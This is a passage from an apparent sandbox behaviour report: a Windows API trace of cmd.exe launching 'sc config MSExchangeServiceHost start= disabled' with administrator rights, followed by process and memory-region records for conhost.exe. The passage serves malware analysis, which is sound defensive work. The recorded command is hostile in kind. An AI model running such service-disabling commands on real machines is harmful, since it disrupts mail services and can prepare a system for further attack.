lpType=0x37ea08*=0x0, lpData=0x37ea10*=0x40, lpcbData=0x37ea0c*=0x1000) returned 0x2 [0133.486] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x37ea08, lpData=0x37ea10, lpcbData=0x37ea0c*=0x1000 | out: lpType=0x37ea08*=0x4, lpData=0x37ea10*=0x1, lpcbData=0x37ea0c*=0x4) returned 0x0 [0133.486] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x37ea08, lpData=0x37ea10, lpcbData=0x37ea0c*=0x1000 | out: lpType=0x37ea08*=0x0, lpData=0x37ea10*=0x1, lpcbData=0x37ea0c*=0x1000) returned 0x2 [0133.486] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x37ea08, lpData=0x37ea10, lpcbData=0x37ea0c*=0x1000 | out: lpType=0x37ea08*=0x4, lpData=0x37ea10*=0x0, lpcbData=0x37ea0c*=0x4) returned 0x0 [0133.486] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x37ea08, lpData=0x37ea10, lpcbData=0x37ea0c*=0x1000 | out: lpType=0x37ea08*=0x4, lpData=0x37ea10*=0x9, lpcbData=0x37ea0c*=0x4) returned 0x0 [0133.486] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x37ea08, lpData=0x37ea10, lpcbData=0x37ea0c*=0x1000 | out: lpType=0x37ea08*=0x4, lpData=0x37ea10*=0x9, lpcbData=0x37ea0c*=0x4) returned 0x0 [0133.486] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x37ea08, lpData=0x37ea10, lpcbData=0x37ea0c*=0x1000 | out: lpType=0x37ea08*=0x0, lpData=0x37ea10*=0x9, lpcbData=0x37ea0c*=0x1000) returned 0x2 [0133.486] RegCloseKey (hKey=0x94) returned 0x0 [0133.487] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29836 [0133.487] srand (_Seed=0x5ad29836) [0133.487] GetCommandLineW () returned="/c sc config MSExchangeServiceHost start= disabled" [0133.487] GetCommandLineW () returned="/c sc config MSExchangeServiceHost start= disabled" [0133.487] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0133.487] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4419d08, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0133.487] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0133.487] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0133.487] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0133.487] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0133.487] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0133.487] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0133.487] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0133.487] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0133.487] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0133.487] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0133.487] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0133.487] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0133.487] GetEnvironmentStringsW () returned 0x4417db0* [0133.487] FreeEnvironmentStringsA (penv="A") returned 1 [0133.487] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.487] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0133.487] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0133.487] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0133.487] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0133.487] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0133.487] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0133.487] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0133.487] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0133.488] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0133.488] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x37f7dc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0133.488] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x37f7dc, lpFilePart=0x37f7d4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x37f7d4*="Desktop") returned 0x1d [0133.488] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0133.488] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x37f558 | out: lpFindFileData=0x37f558) returned 0x44105c8 [0133.488] FindClose (in: hFindFile=0x44105c8 | out: hFindFile=0x44105c8) returned 1 [0133.488] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x37f558 | out: lpFindFileData=0x37f558) returned 0x44105c8 [0133.488] FindClose (in: hFindFile=0x44105c8 | out: hFindFile=0x44105c8) returned 1 [0133.488] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0133.488] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x37f558 | out: lpFindFileData=0x37f558) returned 0x44105c8 [0133.488] FindClose (in: hFindFile=0x44105c8 | out: hFindFile=0x44105c8) returned 1 [0133.488] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0133.488] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0133.488] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0133.488] GetEnvironmentStringsW () returned 0x4417db0* [0133.488] FreeEnvironmentStringsA (penv="=") returned 1 [0133.488] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0133.489] GetConsoleOutputCP () returned 0x1b5 [0133.489] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0133.489] GetUserDefaultLCID () returned 0x409 [0133.489] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0133.489] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x37f90c, cchData=128 | out: lpLCData="0") returned 2 [0133.489] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x37f90c, cchData=128 | out: lpLCData="0") returned 2 [0133.489] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x37f90c, cchData=128 | out: lpLCData="1") returned 2 [0133.489] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0133.489] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0133.489] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0133.489] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0133.489] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0133.489] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0133.489] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0133.489] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0133.489] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0133.489] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0133.489] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0133.490] GetConsoleTitleW (in: lpConsoleTitle=0x441aa60, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.490] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0133.490] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0133.490] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0133.491] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0133.491] _wcsicmp (_String1="sc", _String2=")") returned 74 [0133.491] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0133.491] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0133.491] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0133.491] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0133.491] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0133.491] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0133.492] GetConsoleTitleW (in: lpConsoleTitle=0x37f5f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.492] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0133.492] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0133.492] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0133.492] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0133.492] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0133.492] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0133.492] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0133.492] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0133.492] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0133.492] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0133.492] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0133.492] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0133.492] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0133.492] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0133.492] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0133.492] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0133.492] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0133.493] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0133.493] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0133.493] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0133.493] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0133.493] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0133.493] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0133.493] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0133.493] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0133.493] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0133.493] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0133.493] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0133.493] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0133.493] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0133.493] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0133.493] _wcsicmp (_String1="sc", _String2="START") returned -17 [0133.493] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0133.493] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0133.493] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0133.493] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0133.493] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0133.493] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0133.493] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0133.493] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0133.493] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0133.493] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0133.493] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0133.493] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0133.493] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0133.493] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0133.493] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0133.493] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0133.493] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0133.493] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0133.493] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0133.493] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0133.493] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0133.493] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0133.493] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0133.493] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0133.493] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0133.493] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0133.493] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0133.493] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0133.493] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0133.493] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0133.493] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0133.493] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0133.493] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0133.493] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0133.493] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0133.493] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0133.493] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0133.493] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0133.493] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0133.493] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0133.493] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0133.494] _wcsicmp (_String1="sc", _String2="START") returned -17 [0133.494] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0133.494] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0133.494] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0133.494] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0133.494] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0133.494] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0133.494] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0133.494] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0133.494] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0133.494] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0133.494] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0133.494] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0133.494] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0133.494] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0133.494] SetErrorMode (uMode=0x0) returned 0x0 [0133.494] SetErrorMode (uMode=0x1) returned 0x0 [0133.494] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x44105d0, lpFilePart=0x37f104 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x37f104*="Desktop") returned 0x1d [0133.494] SetErrorMode (uMode=0x0) returned 0x1 [0133.494] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0133.494] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0133.502] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0133.502] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0133.502] GetConsoleTitleW (in: lpConsoleTitle=0x37f384, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.502] InitializeProcThreadAttributeList (in: lpAttributeList=0x37f2b0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x37f294 | out: lpAttributeList=0x37f2b0, lpSize=0x37f294) returned 1 [0133.502] UpdateProcThreadAttribute (in: lpAttributeList=0x37f2b0, dwFlags=0x0, Attribute=0x60001, lpValue=0x37f29c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x37f2b0, lpPreviousValue=0x0) returned 1 [0133.502] GetStartupInfoW (in: lpStartupInfo=0x37f2e8 | out: lpStartupInfo=0x37f2e8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0133.502] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0133.502] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0133.502] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0133.502] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0133.502] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0133.502] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0133.502] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0133.502] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0133.502] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0133.502] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0133.502] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0133.502] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0133.502] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0133.502] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0133.502] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0133.502] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0133.502] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0133.502] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0133.502] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0133.502] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0133.502] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0133.502] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0133.503] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0133.503] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0133.503] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0133.503] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0133.503] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0133.503] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0133.503] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0133.503] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0133.503] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0133.503] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0133.503] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0133.503] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0133.503] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0133.503] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0133.503] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0133.503] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0133.503] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0133.504] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc config MSExchangeServiceHost start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x37f238*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="sc config MSExchangeServiceHost start= disabled", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x37f284 | out: lpCommandLine="sc config MSExchangeServiceHost start= disabled", lpProcessInformation=0x37f284*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xd20, dwThreadId=0xd24)) returned 1 [0133.509] CloseHandle (hObject=0xa4) returned 1 [0133.509] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0133.509] GetEnvironmentStringsW () returned 0x4419f18* [0133.509] FreeEnvironmentStringsA (penv="=") returned 1 [0133.509] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0133.555] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x37f21c | out: lpExitCode=0x37f21c*=0x424) returned 1 [0133.555] CloseHandle (hObject=0xa8) returned 1 [0133.555] _vsnwprintf (in: _Buffer=0x37f304, _BufferCount=0x13, _Format="%08X", _ArgList=0x37f224 | out: _Buffer="00000424") returned 8 [0133.555] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000424") returned 1 [0133.555] GetEnvironmentStringsW () returned 0x441b3c0* [0133.555] FreeEnvironmentStringsA (penv="=") returned 1 [0133.555] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0133.555] GetEnvironmentStringsW () returned 0x441b3c0* [0133.555] FreeEnvironmentStringsA (penv="=") returned 1 [0133.555] DeleteProcThreadAttributeList (in: lpAttributeList=0x37f2b0 | out: lpAttributeList=0x37f2b0) [0133.555] _get_osfhandle (_FileHandle=1) returned 0x3c [0133.555] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0133.555] _get_osfhandle (_FileHandle=1) returned 0x3c [0133.555] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0133.556] _get_osfhandle (_FileHandle=0) returned 0x38 [0133.556] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0133.556] SetConsoleInputExeNameW () returned 0x1 [0133.556] GetConsoleOutputCP () returned 0x1b5 [0133.556] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0133.556] SetThreadUILanguage (LangId=0x0) returned 0x409 [0133.556] exit (_Code=1060) Thread: id = 548 os_tid = 0xd5c Process: id = "168" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x27942000" os_pid = "0xcc8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "167" os_parent_pid = "0xcd0" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8779 start_va = 0x7f757000 end_va = 0x7f757fff entry_point = 0x0 region_type = private name = "private_0x000000007f757000" filename = "" Region: id = 8780 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8781 start_va = 0x9ae4480000 end_va = 0x9ae449ffff entry_point = 0x0 region_type = private name = "private_0x0000009ae4480000" filename = "" Region: id = 8782 start_va = 0x9ae44a0000 end_va = 0x9ae44b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009ae44a0000" filename = "" Region: id = 8783 start_va = 0x9ae44c0000 end_va = 0x9ae44fffff entry_point = 0x0 region_type = private name = "private_0x0000009ae44c0000" filename = "" Region: id = 8784 start_va = 0x7df5ffbd0000 end_va = 0x7ff5ffbcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffbd0000" filename = "" Region: id = 8785 start_va = 0x7ff6c3aa0000 end_va = 0x7ff6c3ac2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3aa0000" filename = "" Region: id = 8786 start_va = 0x7ff6c3ac3000 end_va = 0x7ff6c3ac3fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3ac3000" filename = "" Region: id = 8787 start_va = 0x7ff6c3ace000 end_va = 0x7ff6c3acffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3ace000" filename = "" Region: id = 8788 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 8789 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8790 start_va = 0x9ae4480000 end_va = 0x9ae448ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009ae4480000" filename = "" Region: id = 8791 start_va = 0x9ae4490000 end_va = 0x9ae4496fff entry_point = 0x0 region_type = private name = "private_0x0000009ae4490000" filename = "" Region: id = 8792 start_va = 0x9ae4500000 end_va = 